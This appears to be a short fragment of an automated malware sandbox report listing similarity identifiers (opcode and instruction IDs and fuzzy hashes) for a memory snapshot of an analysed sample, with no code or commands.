                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d188ec8a1f0a7d66ff6f0bc3c5d9ec34a7238a352ae6738ac872fa4dfdc3be9a
                                        • Instruction ID: c5cfc718e4e9545dcc84335b8800d2496c5a7cc897a32f28180242b2cfb87636
                                        • Opcode Fuzzy Hash: d188ec8a1f0a7d66ff6f0bc3c5d9ec34a7238a352ae6738ac872fa4dfdc3be9a
                                        • Instruction Fuzzy Hash: C9F0FB319401099FCB0AFBB4FA8499D7BBAEB40304F50456884089B258EE306E099B92